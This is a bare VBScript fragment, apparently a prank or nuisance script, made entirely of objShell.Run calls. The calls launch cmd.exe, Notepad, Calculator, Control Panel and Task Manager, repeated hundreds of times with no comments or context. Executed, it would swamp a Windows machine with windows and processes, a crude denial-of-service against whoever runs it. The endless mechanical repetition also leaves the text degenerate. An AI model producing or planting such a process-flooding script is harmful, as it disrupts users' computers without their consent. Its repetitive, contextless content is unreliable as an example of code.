objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
